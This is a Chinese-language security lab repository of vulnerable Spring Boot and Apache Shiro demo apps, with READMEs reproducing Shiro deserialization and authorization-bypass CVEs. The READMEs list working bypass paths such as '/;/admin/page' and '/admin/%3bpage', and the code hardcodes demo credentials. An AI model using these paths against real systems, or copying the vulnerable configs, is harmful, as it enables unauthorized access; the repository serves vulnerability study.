| | IDE | IDEA 2020.1.1 ULTIMATE | 19 | 20 | 漏洞成功利用存在下面两个条件: 21 | 22 | 1. 若Shiro版本大于1.5.1,需要应用不能部署在根目录,如`/test`目录下(原因见参考链接1)。 23 | 2. Spring控制器中没有另外的权限校验代码 24 | 25 | 访问`/admin/page`接口,可以看到被`authc`拦截器拦截了,将会跳转到登录接口进行登录。 26 | 27 | image-20210128172206395 28 | 29 | 访问`/;/admin/page`,成功绕过`authc`拦截器,获取到了资源。 30 | 31 | image-20210128172253231 32 | 33 | ### 参考链接 34 | 35 | * [Apache Shiro权限绕过漏洞分析(CVE-2020-11989)](https://xz.aliyun.com/t/7964) -------------------------------------------------------------------------------- /shiro_cve-2020-11989/src/main/java/org/syclover/srpingbootshiro/SrpingbootShiroApplication.java: -------------------------------------------------------------------------------- 1 | package org.syclover.srpingbootshiro; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | import org.springframework.boot.builder.SpringApplicationBuilder; 6 | import org.springframework.boot.web.servlet.ServletComponentScan; 7 | import org.springframework.boot.web.servlet.support.SpringBootServletInitializer; 8 | 9 | @SpringBootApplication 10 | public class SrpingbootShiroApplication extends SpringBootServletInitializer { 11 | 12 | @Override 13 | protected SpringApplicationBuilder configure(SpringApplicationBuilder builder) { 14 | return builder.sources(SrpingbootShiroApplication.class); 15 | } 16 | 17 | public static void main(String[] args) { 18 | 19 | SpringApplication.run(SrpingbootShiroApplication.class, args); 20 | } 21 | 22 | } 23 | -------------------------------------------------------------------------------- /shiro_cve-2020-13933/src/main/java/org/test/springbootshiro/MyRealm.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.apache.shiro.authc.*; 4 | import org.apache.shiro.authz.AuthorizationInfo; 5 | import org.apache.shiro.realm.AuthorizingRealm; 6 | import org.apache.shiro.subject.PrincipalCollection; 7 | 8 | public class MyRealm extends AuthorizingRealm { 9 | @Override 10 | protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principalCollection) { 11 | return null; 12 | } 13 | 14 | @Override 15 | protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException { 16 | String username = (String) authenticationToken.getPrincipal(); 17 | if (!"java".equals(username)){ 18 | throw new UnknownAccountException("unkown user"); 19 | } 20 | return new SimpleAuthenticationInfo(username, "123", getName()); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /shiro_cve-2020-17523/src/main/java/org/test/springbootshiro/MyRealm.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.apache.shiro.authc.*; 4 | import org.apache.shiro.authz.AuthorizationInfo; 5 | import org.apache.shiro.realm.AuthorizingRealm; 6 | import org.apache.shiro.subject.PrincipalCollection; 7 | 8 | public class MyRealm extends AuthorizingRealm { 9 | @Override 10 | protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principalCollection) { 11 | return null; 12 | } 13 | 14 | @Override 15 | protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException { 16 | String username = (String) authenticationToken.getPrincipal(); 17 | if (!"java".equals(username)){ 18 | throw new UnknownAccountException("unkown user"); 19 | } 20 | return new SimpleAuthenticationInfo(username, "123", getName()); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /shiro_cve-2020-11989/src/main/java/org/syclover/srpingbootshiro/MyRealm.java: -------------------------------------------------------------------------------- 1 | package org.syclover.srpingbootshiro; 2 | 3 | import org.apache.shiro.authc.*; 4 | import org.apache.shiro.authz.AuthorizationInfo; 5 | import org.apache.shiro.realm.AuthorizingRealm; 6 | import org.apache.shiro.subject.PrincipalCollection; 7 | 8 | public class MyRealm extends AuthorizingRealm { 9 | @Override 10 | protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principalCollection) { 11 | return null; 12 | } 13 | 14 | @Override 15 | protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException { 16 | String username = (String) authenticationToken.getPrincipal(); 17 | if (!"java".equals(username)){ 18 | throw new UnknownAccountException("unkown user"); 19 | } 20 | return new SimpleAuthenticationInfo(username, "123", getName()); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /shiro-721/src/main/webapp/index.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | 20 | <%-- Forward the user to the home page --%> 21 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/index.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | 20 | <%-- Forward the user to the home page --%> 21 | -------------------------------------------------------------------------------- /shiro_cve-2020-17523/README.md: -------------------------------------------------------------------------------- 1 | # Shiro 权限绕过漏洞(CVE-2020-17523) 2 | 3 | ### 漏洞描述 4 | 5 | 当Shiro和 Spring 结合使用时,在一定权限匹配规则下,攻击者可通过构造特殊的 HTTP 请求包完成身份认证绕过。 6 | 7 | 具体绕过原因有两个: 8 | 9 | 1. tokenizeToStringArray函数没有正确处理空格。 10 | 2. 处理最后一个/的逻辑,不应在循环匹配路径的逻辑之前。 11 | 12 | 影响范围: 13 | 14 | * Shiro < 1.7.1 15 | 16 | ### 漏洞复现 17 | 18 | 环境 19 | 20 | | Shiro Version | Shiro 1.5.1 | 21 | | :------------ | :--------------------- | 22 | | Web Server | Tomcat 8.5.53 | 23 | | IDE | IDEA 2020.1.1 ULTIMATE | 24 | 25 | 请求`/admin/test` 302跳转至login: 26 | 27 | image-20210208145249325 28 | 29 | 绕过姿势一:`/admin/%20` 30 | 31 | image-20210208145354757 32 | 33 | 绕过姿势二:`/admin/%2e` 34 | 35 | image-20210208145429278 36 | 37 | ### 参考链接 38 | 39 | * [Shiro 权限绕过漏洞(CVE-2020-11989)](https://github.com/xhycccc/Shiro-Vuln-Demo/tree/main/shiro_cve-2020-11989) -------------------------------------------------------------------------------- /shiro-721/README.md: -------------------------------------------------------------------------------- 1 | # Shiro-721 RememberMe Padding Oracle 漏洞(CVE-2019-12422) 2 | 3 | ### 漏洞描述 4 | 5 | Shiro使用了AES-128-CBC模式对cookie进行加密,该模式易受到[`Padding Oracle`攻击](https://paper.seebug.org/1123/)。 6 | 7 | Shiro处理cookie的流程:得到rememberMe的cookie值 》 Base64解码 》 AES解密 》 反序列化。 8 | 9 | 所以`padding oracle`攻击方式是,在不需要知道AES密钥且初始化向量IV可控(在rememberMe字段中)的前提下,尝试通过不同IV构造特定的序列化数据,以通过服务器端的==字符填充检查==,从而继续后面的反序列化操作。 10 | 11 | ### 漏洞复现 12 | 13 | #### 环境启动 14 | 15 | 将target目录下编译完成的 samples-web-1.4.1.war 包拷贝到 Tomcat 的 webapps 目录下,启动tomcat即可。 16 | 17 | ![20210630171858](20210630171858.jpg) 18 | 19 | #### 复现参考:[Shiro-721 RCE Via Padding Oracle Attack](https://github.com/inspiringz/Shiro-721) 20 | 21 | ### 参考链接 22 | 23 | * [Shiro-721 RCE Via Padding Oracle Attack](https://github.com/inspiringz/Shiro-721) 24 | * [Shiro RCE again(Padding Oracle Attack)](https://www.anquanke.com/post/id/192819) 25 | * [CVE-2019-12422 Shiro721 ( Apache Shiro RememberMe Padding Oracle 1.4.1 反序列化漏洞) 分析 下 ](https://www.guildhab.top/2020/12/cve-2019-12422-shiro721-apache-shiro-rememberme-padding-oracle-1-4-1-反序列化漏洞-分析-下/) -------------------------------------------------------------------------------- /shiro_cve-2020-1957/src/main/java/org/javaboy/shirobasic/MyRealm.java: -------------------------------------------------------------------------------- 1 | package org.javaboy.shirobasic; 2 | 3 | import org.apache.shiro.authc.*; 4 | import org.apache.shiro.authz.AuthorizationInfo; 5 | import org.apache.shiro.realm.AuthorizingRealm; 6 | import org.apache.shiro.subject.PrincipalCollection; 7 | 8 | import javax.security.auth.login.AccountNotFoundException; 9 | 10 | /** 11 | * @Author 江南一点雨 12 | * @Site www.javaboy.org 2019-06-05 11:10 13 | */ 14 | public class MyRealm extends AuthorizingRealm { 15 | @Override 16 | protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principals) { 17 | return null; 18 | } 19 | 20 | @Override 21 | protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken token) throws AuthenticationException { 22 | String username = (String) token.getPrincipal(); 23 | if (!"javaboy".equals(username)) { 24 | throw new UnknownAccountException("账户不存在!"); 25 | } 26 | return new SimpleAuthenticationInfo(username, "123", getName()); 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /shiro-721/src/main/webapp/include.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ page import="org.apache.shiro.SecurityUtils" %> 20 | <%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %> 21 | <%@ taglib prefix="fmt" uri="http://java.sun.com/jsp/jstl/fmt" %> 22 | <%@ taglib prefix="shiro" uri="http://shiro.apache.org/tags" %> -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/include.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ page import="org.apache.shiro.SecurityUtils" %> 20 | <%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %> 21 | <%@ taglib prefix="fmt" uri="http://java.sun.com/jsp/jstl/fmt" %> 22 | <%@ taglib prefix="shiro" uri="http://shiro.apache.org/tags" %> -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Shiro-Vuln-Demo 2 | Shiro漏洞实例源码 3 | 4 | ## Shiro反序列化系列 5 | | 漏洞编号 | CVE | 描述 | 影响范围 | 6 | | --------- | -------------- | -------------------------------------- | ------------- | 7 | | Shiro-550 | CVE-2016-4437 | RememberMe反序列化漏洞 | Shiro < 1.2.4 | 8 | | Shiro-721 | CVE-2019-12422 | RememberMe Padding Oracle 反序列化漏洞 | Shiro < 1.4.2 | 9 | 10 | 11 | 12 | ## Shiro权限绕过系列 13 | | CVE | 描述 | 影响范围 | payload | 14 | | -------------- | ---------------------- | ------------- | ------------------------ | 15 | | CVE-2020-1957 | 权限绕过 | Shiro < 1.5.2 | /hello/123/ | 16 | | CVE-2020-11989 | CVE-2020-1957补丁绕过 | Shiro < 1.5.3 | /;/admin/page | 17 | | CVE-2020-13933 | CVE-2020-11989补丁绕过 | Shiro < 1.6.0 | /admin/%3bpage | 18 | | CVE-2020-17523 | 权限绕过 | Shiro < 1.7.1 | /admin/%20
/admin/%2e | 19 | 20 | 待补充: 21 | 22 | | CVE | 描述 | 备注 | 23 | | -------------- | -------------------------- | ------------- | 24 | | CVE-2016-6802 | Shiro < 1.3.2 验证绕过漏洞 | 无环境、无POC | 25 | | CVE-2020-17510 | Shiro < 1.7.0 验证绕过漏洞 | 有环境、无POC | 26 | 27 | -------------------------------------------------------------------------------- /shiro_cve-2020-11989/src/main/java/org/syclover/srpingbootshiro/LoginController.java: -------------------------------------------------------------------------------- 1 | package org.syclover.srpingbootshiro; 2 | 3 | import org.apache.shiro.SecurityUtils; 4 | import org.apache.shiro.authc.AuthenticationException; 5 | import org.apache.shiro.authc.UsernamePasswordToken; 6 | import org.apache.shiro.subject.Subject; 7 | import org.springframework.web.bind.annotation.GetMapping; 8 | import org.springframework.web.bind.annotation.PostMapping; 9 | import org.springframework.web.bind.annotation.RestController; 10 | 11 | @RestController 12 | public class LoginController { 13 | @PostMapping("/doLogin") 14 | public void doLogin(String username, String password) { 15 | Subject subject = SecurityUtils.getSubject(); 16 | try { 17 | subject.login(new UsernamePasswordToken(username, password)); 18 | System.out.println("success"); 19 | } catch (AuthenticationException e) { 20 | e.printStackTrace(); 21 | System.out.println("failed"); 22 | } 23 | } 24 | @GetMapping("/admin/page") 25 | public String admin() { 26 | return "admin page"; 27 | } 28 | @GetMapping("/login") 29 | public String login() { 30 | return "please login!"; 31 | } 32 | } -------------------------------------------------------------------------------- /shiro_cve-2020-17510/src/main/java/com/l4g/springshiro/controllers/LoginController.java: -------------------------------------------------------------------------------- 1 | package com.l4g.springshiro.controllers; 2 | 3 | import org.apache.shiro.SecurityUtils; 4 | import org.apache.shiro.authc.AuthenticationException; 5 | import org.apache.shiro.authc.UsernamePasswordToken; 6 | import org.apache.shiro.subject.Subject; 7 | import org.springframework.web.bind.annotation.GetMapping; 8 | import org.springframework.web.bind.annotation.PostMapping; 9 | import org.springframework.web.bind.annotation.RestController; 10 | 11 | @RestController 12 | public class LoginController { 13 | @PostMapping("/doLogin") 14 | public void doLogin(String username, String password) { 15 | Subject subject = SecurityUtils.getSubject(); 16 | try { 17 | subject.login(new UsernamePasswordToken(username, password)); 18 | System.out.println("success"); 19 | } catch (AuthenticationException e) { 20 | e.printStackTrace(); 21 | System.out.println("fail!"); 22 | } 23 | } 24 | @GetMapping("/admin/hello") 25 | public String hello() { 26 | return "hello"; 27 | } 28 | @GetMapping("/login") 29 | public String login() { 30 | return "please login!"; 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /shiro-550/src/main/java/com/example/shiro550/shiro/MainRealm.java: -------------------------------------------------------------------------------- 1 | package com.example.shiro550.shiro; 2 | 3 | import org.apache.shiro.authc.AuthenticationException; 4 | import org.apache.shiro.authc.AuthenticationInfo; 5 | import org.apache.shiro.authc.AuthenticationToken; 6 | import org.apache.shiro.authc.IncorrectCredentialsException; 7 | import org.apache.shiro.authc.SimpleAuthenticationInfo; 8 | import org.apache.shiro.authz.AuthorizationInfo; 9 | import org.apache.shiro.realm.AuthorizingRealm; 10 | import org.apache.shiro.subject.PrincipalCollection; 11 | 12 | public class MainRealm extends AuthorizingRealm { 13 | protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principalCollection) { 14 | return null; 15 | } 16 | 17 | protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException { 18 | String username = (String)authenticationToken.getPrincipal(); 19 | String password = new String((char[])authenticationToken.getCredentials()); 20 | if (username.equals("admin") && password.equals("admin")) 21 | return (AuthenticationInfo)new SimpleAuthenticationInfo(username, password, getName()); 22 | throw new IncorrectCredentialsException("Username or password is incorrect."); 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /shiro_cve-2020-13933/src/main/java/org/test/springbootshiro/LoginController.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.apache.shiro.SecurityUtils; 4 | import org.apache.shiro.authc.AuthenticationException; 5 | import org.apache.shiro.authc.UsernamePasswordToken; 6 | import org.apache.shiro.subject.Subject; 7 | import org.springframework.web.bind.annotation.GetMapping; 8 | import org.springframework.web.bind.annotation.PathVariable; 9 | import org.springframework.web.bind.annotation.PostMapping; 10 | import org.springframework.web.bind.annotation.RestController; 11 | 12 | @RestController 13 | public class LoginController { 14 | @PostMapping("/doLogin") 15 | public void doLogin(String username, String password) { 16 | Subject subject = SecurityUtils.getSubject(); 17 | try { 18 | subject.login(new UsernamePasswordToken(username, password)); 19 | System.out.println("success"); 20 | } catch (AuthenticationException e) { 21 | e.printStackTrace(); 22 | System.out.println("failed"); 23 | } 24 | } 25 | @GetMapping("/admin/{name}") 26 | public String admin(@PathVariable String name) { 27 | return "admin page"; 28 | } 29 | @GetMapping("/login") 30 | public String login() { 31 | return "please login!"; 32 | } 33 | } -------------------------------------------------------------------------------- /shiro_cve-2020-17523/src/main/java/org/test/springbootshiro/LoginController.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.apache.shiro.SecurityUtils; 4 | import org.apache.shiro.authc.AuthenticationException; 5 | import org.apache.shiro.authc.UsernamePasswordToken; 6 | import org.apache.shiro.subject.Subject; 7 | import org.springframework.web.bind.annotation.GetMapping; 8 | import org.springframework.web.bind.annotation.PathVariable; 9 | import org.springframework.web.bind.annotation.PostMapping; 10 | import org.springframework.web.bind.annotation.RestController; 11 | 12 | /** 13 | * @author jweny 14 | */ 15 | 16 | @RestController 17 | public class LoginController { 18 | @PostMapping("/doLogin") 19 | public void doLogin(String username, String password) { 20 | Subject subject = SecurityUtils.getSubject(); 21 | try { 22 | subject.login(new UsernamePasswordToken(username, password)); 23 | System.out.println("success"); 24 | } catch (AuthenticationException e) { 25 | e.printStackTrace(); 26 | System.out.println("failed"); 27 | } 28 | } 29 | @GetMapping("/admin/{name}") 30 | public String admin(String name) { 31 | return "admin page"; 32 | } 33 | 34 | @GetMapping("/login") 35 | public String login() { 36 | return "please login!"; 37 | } 38 | } -------------------------------------------------------------------------------- /shiro_cve-2020-13933/src/main/java/org/test/springbootshiro/ShiroConfig.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.apache.shiro.spring.web.ShiroFilterFactoryBean; 4 | import org.apache.shiro.web.mgt.DefaultWebSecurityManager; 5 | import org.springframework.context.annotation.Bean; 6 | import org.springframework.context.annotation.Configuration; 7 | 8 | import java.util.LinkedHashMap; 9 | import java.util.Map; 10 | 11 | @Configuration 12 | public class ShiroConfig { 13 | @Bean 14 | MyRealm myRealm() { 15 | return new MyRealm(); 16 | } 17 | 18 | @Bean 19 | DefaultWebSecurityManager securityManager(){ 20 | DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); 21 | manager.setRealm(myRealm()); 22 | return manager; 23 | } 24 | 25 | @Bean 26 | ShiroFilterFactoryBean shiroFilterFactoryBean(){ 27 | ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); 28 | bean.setSecurityManager(securityManager()); 29 | bean.setLoginUrl("/login"); 30 | bean.setSuccessUrl("/index"); 31 | bean.setUnauthorizedUrl("/unauthorizedurl"); 32 | Map map = new LinkedHashMap<>(); 33 | map.put("/doLogin/", "anon"); 34 | map.put("/admin/*", "authc"); 35 | bean.setFilterChainDefinitionMap(map); 36 | return bean; 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /shiro_cve-2020-17523/src/main/java/org/test/springbootshiro/ShiroConfig.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.apache.shiro.spring.web.ShiroFilterFactoryBean; 4 | import org.apache.shiro.web.mgt.DefaultWebSecurityManager; 5 | import org.springframework.context.annotation.Bean; 6 | import org.springframework.context.annotation.Configuration; 7 | 8 | import java.util.LinkedHashMap; 9 | import java.util.Map; 10 | 11 | @Configuration 12 | public class ShiroConfig { 13 | @Bean 14 | MyRealm myRealm() { 15 | return new MyRealm(); 16 | } 17 | 18 | @Bean 19 | DefaultWebSecurityManager securityManager(){ 20 | DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); 21 | manager.setRealm(myRealm()); 22 | return manager; 23 | } 24 | 25 | @Bean 26 | ShiroFilterFactoryBean shiroFilterFactoryBean(){ 27 | ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); 28 | bean.setSecurityManager(securityManager()); 29 | bean.setLoginUrl("/login"); 30 | bean.setSuccessUrl("/index"); 31 | bean.setUnauthorizedUrl("/unauthorizedurl"); 32 | Map map = new LinkedHashMap<>(); 33 | map.put("/doLogin/", "anon"); 34 | map.put("/admin/*", "authc"); 35 | bean.setFilterChainDefinitionMap(map); 36 | return bean; 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /shiro_cve-2020-11989/src/main/java/org/syclover/srpingbootshiro/ShiroConfig.java: -------------------------------------------------------------------------------- 1 | package org.syclover.srpingbootshiro; 2 | 3 | import org.apache.shiro.spring.web.ShiroFilterFactoryBean; 4 | import org.apache.shiro.web.mgt.DefaultWebSecurityManager; 5 | import org.springframework.context.annotation.Bean; 6 | import org.springframework.context.annotation.Configuration; 7 | 8 | import java.util.LinkedHashMap; 9 | import java.util.Map; 10 | 11 | @Configuration 12 | public class ShiroConfig { 13 | @Bean 14 | MyRealm myRealm() { 15 | return new MyRealm(); 16 | } 17 | 18 | @Bean 19 | DefaultWebSecurityManager securityManager(){ 20 | DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); 21 | manager.setRealm(myRealm()); 22 | return manager; 23 | } 24 | 25 | @Bean 26 | ShiroFilterFactoryBean shiroFilterFactoryBean(){ 27 | ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); 28 | bean.setSecurityManager(securityManager()); 29 | bean.setLoginUrl("/login"); 30 | bean.setSuccessUrl("/index"); 31 | bean.setUnauthorizedUrl("/unauthorizedurl"); 32 | Map map = new LinkedHashMap<>(); 33 | map.put("/doLogin", "anon"); 34 | map.put("/admin/*", "authc"); 35 | bean.setFilterChainDefinitionMap(map); 36 | return bean; 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /shiro_cve-2020-17510/src/main/java/com/l4g/springshiro/config/ShiroConfig.java: -------------------------------------------------------------------------------- 1 | package com.l4g.springshiro.config; 2 | 3 | import com.l4g.springshiro.MyRealm; 4 | import org.apache.shiro.spring.web.ShiroFilterFactoryBean; 5 | import org.apache.shiro.web.mgt.DefaultWebSecurityManager; 6 | import org.springframework.context.annotation.Bean; 7 | import org.springframework.context.annotation.Configuration; 8 | 9 | import java.util.LinkedHashMap; 10 | import java.util.Map; 11 | 12 | @Configuration 13 | public class ShiroConfig { 14 | @Bean 15 | MyRealm myRealm() { 16 | return new MyRealm(); 17 | } 18 | 19 | @Bean 20 | DefaultWebSecurityManager securityManager() { 21 | DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); 22 | manager.setRealm(myRealm()); 23 | return manager; 24 | } 25 | 26 | @Bean 27 | ShiroFilterFactoryBean shiroFilterFactoryBean() { 28 | ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); 29 | bean.setSecurityManager(securityManager()); 30 | bean.setLoginUrl("/login"); 31 | bean.setSuccessUrl("/index"); 32 | bean.setUnauthorizedUrl("/unauthorizedurl"); 33 | Map map = new LinkedHashMap<>(); 34 | map.put("/doLogin", "anon"); 35 | map.put("/admin/*", "authc"); 36 | bean.setFilterChainDefinitionMap(map); 37 | return bean; 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /shiro_cve-2020-1957/src/main/java/org/javaboy/shirobasic/LoginController.java: -------------------------------------------------------------------------------- 1 | package org.javaboy.shirobasic; 2 | 3 | import org.apache.shiro.SecurityUtils; 4 | import org.apache.shiro.authc.AuthenticationException; 5 | import org.apache.shiro.authc.UsernamePasswordToken; 6 | import org.apache.shiro.subject.Subject; 7 | import org.springframework.web.bind.annotation.GetMapping; 8 | import org.springframework.web.bind.annotation.PathVariable; 9 | import org.springframework.web.bind.annotation.PostMapping; 10 | import org.springframework.web.bind.annotation.RestController; 11 | 12 | /** 13 | * @Author 江南一点雨 14 | * @Site www.javaboy.org 2019-06-05 11:24 15 | */ 16 | @RestController 17 | public class LoginController { 18 | @PostMapping("/doLogin") 19 | public void doLogin(String username, String password) { 20 | Subject subject = SecurityUtils.getSubject(); 21 | try { 22 | subject.login(new UsernamePasswordToken(username, password)); 23 | System.out.println("登录成功!"); 24 | } catch (AuthenticationException e) { 25 | e.printStackTrace(); 26 | System.out.println("登录失败!"); 27 | } 28 | } 29 | 30 | @GetMapping("/hello/{currentPage}") 31 | public String hello(@PathVariable Integer currentPage) { 32 | return "hello"; 33 | } 34 | 35 | @GetMapping("/login") 36 | public String login() { 37 | return "please login!"; 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /shiro-721/src/main/webapp/logout.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ include file="include.jsp" %> 20 | 21 | 22 | 23 | "/> 24 | 25 | 26 | 27 |

If you are not automatically redirected, click the 'Logout' button.

28 | 29 |
" method="post"> 30 | 31 |
32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/logout.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ include file="include.jsp" %> 20 | 21 | 22 | 23 | "/> 24 | 25 | 26 | 27 |

If you are not automatically redirected, click the 'Logout' button.

28 | 29 |
" method="post"> 30 | 31 |
32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /shiro-721/src/main/webapp/account/index.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ include file="../include.jsp" %> 20 | 21 | 22 | 23 | "/> 24 | 25 | 26 | 27 |

Users only

28 | 29 |

You are currently logged in.

30 | 31 |

">Return to the home page.

32 | 33 |

" onclick="document.getElementById('logout_form').submit();return false;">Log out.

34 |
" method="post">
